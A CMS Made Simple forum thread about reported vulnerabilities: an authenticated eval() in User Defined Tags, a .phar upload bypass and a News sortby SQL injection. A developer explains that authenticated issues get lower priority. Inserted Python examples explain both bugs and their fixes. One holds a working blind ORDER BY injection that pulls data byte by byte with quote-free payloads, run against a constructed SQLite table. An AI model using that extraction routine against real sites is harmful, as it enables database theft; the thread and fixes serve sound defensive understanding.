Someone just pointed this out to me: https://www.exploit-db.com/exploits/49345. Wondered if a fix is available.
Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.
// Vulnerable eval() code
if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {
...
CMSMS eval vulnerability
Re: CMSMS eval vulnerability
Sorry, but that is not a vulnerability:
Please read: https://www.cmsmadesimple.org/community ... nerability
Soooo... you need to login as administrator to hack your own site?.... really???
"Reproduction Steps:
1. Login as administrator user and navigate to Extensions->User Defined Tags"
"There are 10 types of people in this world, those who understand binary... and those who don't."
* by the way: English is NOT my native language (sorry for any mistakes...).
Code of Conduct | CMSMS Docs | Help Support CMSMS
My developer Page on the Forge
GeekMoot 2015 in Ghent, Belgium: I was there!
GeekMoot 2016 in Leicester, UK: I was there!
DevMoot 2023 in Cynwyd, Wales: I was there!
[SOLVED] Re: CMSMS eval vulnerability
You would know better than I. Total newb when it comes to things like that. I considered what you said prior to posting. I wondered if they meant this gave you RCE on the webhost's server, not to affect the website you already have admin access to, but to the server more broadly.
Re: CMSMS vulnerability
Sorry, the person that pointed this out to me was actually pointing me to a different place than I thought. Maybe this will prove more helpful to the dev team.
CMS Made Simple - File upload bypass with .phar extension leads to RCE riccardo krauter (Mar 19)
1) Summary
Affected software CMS Made Simple-2.2.15
Vendor URL http://www.cmsmadesimple.org/
Vulnerability File upload bypass with .phar extension leads to RCE
2) Vulnerability Description
The vulnerability affects the `FilePicker` module;
it is possible to bypass the restriction and upload a malicious file with `.phar` extension to gain Remote Code
Execution.
This vulnerability is remotely...
CMS Made Simple SQL injection on m1_sortby parameter riccardo krauter (Mar 19)
1) Summary
Affected software CMS Made Simple-2.2.15
Vendor URL http://www.cmsmadesimple.org/
Vulnerability SQL injection
2) Vulnerability Description
The affected software is vulnerable to SQL injection via the m1_sortby POST parameter of the News module, reachable via
the moduleinterface.php page.
The `sortby` parameter is sanitized by replacing the `'` with the `_` character; anyway it is...
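The FilePicker advisory above says the upload restriction can be bypassed with a `.phar` extension. The usual root cause of that bug class is that the upload filter is a deny-list of extensions written independently of the web server's PHP handler rule, which decides what actually executes. The following is an added example (Python, so it runs stand-alone; it is not CMSMS's FilePicker code and does not reproduce its filter). The handler regex is an assumption taken from the FilesMatch pattern Debian's packaged PHP module configuration ships with; the deny-list, allow-list and filenames are constructed for the example.

```python
import re

# ASSUMPTION: the server hands these extensions to the PHP interpreter. This is the
# FilesMatch pattern from Debian's packaged PHP module config; substitute the handler
# rule of the host being audited.
PHP_HANDLER_RE = re.compile(r".+\.ph(ar|p|tml)$", re.IGNORECASE)

# Constructed deny-list of "dangerous" extensions, written before .phar was thought of.
DENYLIST = {"php", "php3", "php4", "php5", "phtml"}

# Constructed allow-list: what an image picker actually needs to accept.
ALLOWLIST = {"jpg", "jpeg", "png", "gif"}


def extension(filename):
    """Last dotted component of the basename, lower-cased; '' when there is none."""
    name = filename.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def denylist_accepts(filename):
    """Upload policy of the vulnerable kind: block known-bad extensions, allow the rest."""
    return extension(filename) not in DENYLIST


def allowlist_accepts(filename):
    """Upload policy of the hardened kind: allow only what the feature needs."""
    return extension(filename) in ALLOWLIST


def server_executes(filename):
    """Would the (assumed) handler rule run this file as PHP?"""
    return PHP_HANDLER_RE.match(filename.rsplit("/", 1)[-1]) is not None


def executable_uploads(filenames, accepts):
    """Names that the upload policy accepts AND the server would execute: each one is an RCE gap."""
    return [f for f in filenames if accepts(f) and server_executes(f)]


# Constructed sample of attacker-chosen filenames.
SAMPLE_UPLOADS = [
    "avatar.png", "shell.php", "shell.PHP5", "shell.phtml",
    "shell.phar", "shell.Phar", "photo.php.jpg",
]

if __name__ == "__main__":
    print("deny-list gaps:", executable_uploads(SAMPLE_UPLOADS, denylist_accepts))
    print("allow-list gaps:", executable_uploads(SAMPLE_UPLOADS, allowlist_accepts))
```

Running it lists `shell.phar` and `shell.Phar` as deny-list gaps and nothing for the allow-list. The general lesson is the one the advisory illustrates: the set of executable extensions belongs to the server configuration, not to the application, so an upload filter can only be trusted if it admits a closed set of harmless types. The example deliberately ignores cases such as double extensions under an `AddHandler`-style rule or content-sniffing; those need the same allow-list plus a server that never executes from the upload directory.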
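The News advisory above says `sortby` is "sanitized" by replacing `'` with `_`. That does nothing for an `ORDER BY` injection, because an `ORDER BY` expression needs no string literal at all: a `CASE` expression comparing against `char(...)` changes the row order depending on a condition, which is enough to read other tables one byte at a time. The following is an added example (Python with SQLite; it is not CMSMS's News module and its table, flag and column names are constructed). It puts the quote-replacing version beside an allow-list version, which is the only workable fix since `ORDER BY` cannot take a bound parameter.

```python
import re
import sqlite3

# Constructed stand-in for a News table; not CMSMS's real schema. Titles are chosen so that
# sorting by news_id and sorting by title give visibly different row orders.
NEWS_ROWS = [(1, "Zebra"), (2, "Apple"), (3, "Mango")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (news_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", NEWS_ROWS)
    # Constructed second table holding something an attacker wants to read.
    conn.execute("CREATE TABLE secret (flag TEXT)")
    conn.execute("INSERT INTO secret VALUES ('s3cr3t')")
    return conn


def vulnerable_sort(conn, sortby):
    """Mirrors the sanitization the advisory describes: only ' is replaced by _."""
    sanitized = sortby.replace("'", "_")
    return conn.execute(f"SELECT news_id, title FROM news ORDER BY {sanitized}").fetchall()


def blind_payload(pos, code):
    """ORDER BY injection without a single quote character: if byte `pos` of the flag
    equals `code`, rows come back sorted by news_id, otherwise by title."""
    return (f"(CASE WHEN (SELECT substr(flag,{pos},1) FROM secret)=char({code}) "
            f"THEN news_id ELSE title END)")


def leak_char(conn, pos):
    """Recover one byte by comparing the row order against the known news_id order."""
    baseline = vulnerable_sort(conn, "news_id")
    for code in range(32, 127):  # printable ASCII
        payload = blind_payload(pos, code)
        assert "'" not in payload  # the quote filter never fires
        if vulnerable_sort(conn, payload) == baseline:
            return chr(code)
    return None  # substr past the end returns '' and matches nothing


def leak_flag(conn, max_len=32):
    out = ""
    for pos in range(1, max_len + 1):
        ch = leak_char(conn, pos)
        if ch is None:
            break
        out += ch
    return out


# Hardened version: admit only a fixed set of column names and directions.
SAFE_SORTBY = re.compile(r"(news_id|title)(?: (asc|desc))?", re.IGNORECASE)


def is_safe_sortby(sortby):
    return SAFE_SORTBY.fullmatch(sortby) is not None


def hardened_sort(conn, sortby):
    if not is_safe_sortby(sortby):
        raise ValueError(f"rejected sort expression: {sortby!r}")
    return conn.execute(f"SELECT news_id, title FROM news ORDER BY {sortby}").fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked through ORDER BY:", leak_flag(db))
    print("hardened, title desc:", hardened_sort(db, "title desc"))
```

Running it prints the constructed flag extracted entirely through row ordering, with no quote character anywhere in the payloads; the allow-list rejects every one of them while still accepting `title desc`. The same approach applies to any identifier position (column names, table names, `LIMIT` clauses) where parameter binding is unavailable.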
Re: CMSMS eval vulnerability
To be clear my initial comment was related to the RCE not your post which is a pertinent question.
WRT to your last post: do you have a link that we can follow? Thanks.
Re: CMSMS eval vulnerability
https://seclists.org/fulldisclosure/ and search for 2.2.15
Re: CMSMS eval vulnerability
Looking at those, I'll refer you back to my original reply, since they all require authentication. There are situations where we may tighten up security a bit, specifically where there is a risk of escalation of rights and there is no mitigation via permission granularity, and we'll do it as time permits, as stated in the link I posted. Other than those, we pay particular attention to, and try to fix, those that don't require authentication, as those are the ones that are extremely dangerous. And we do it as fast as we can and in a collaborative way whenever possible.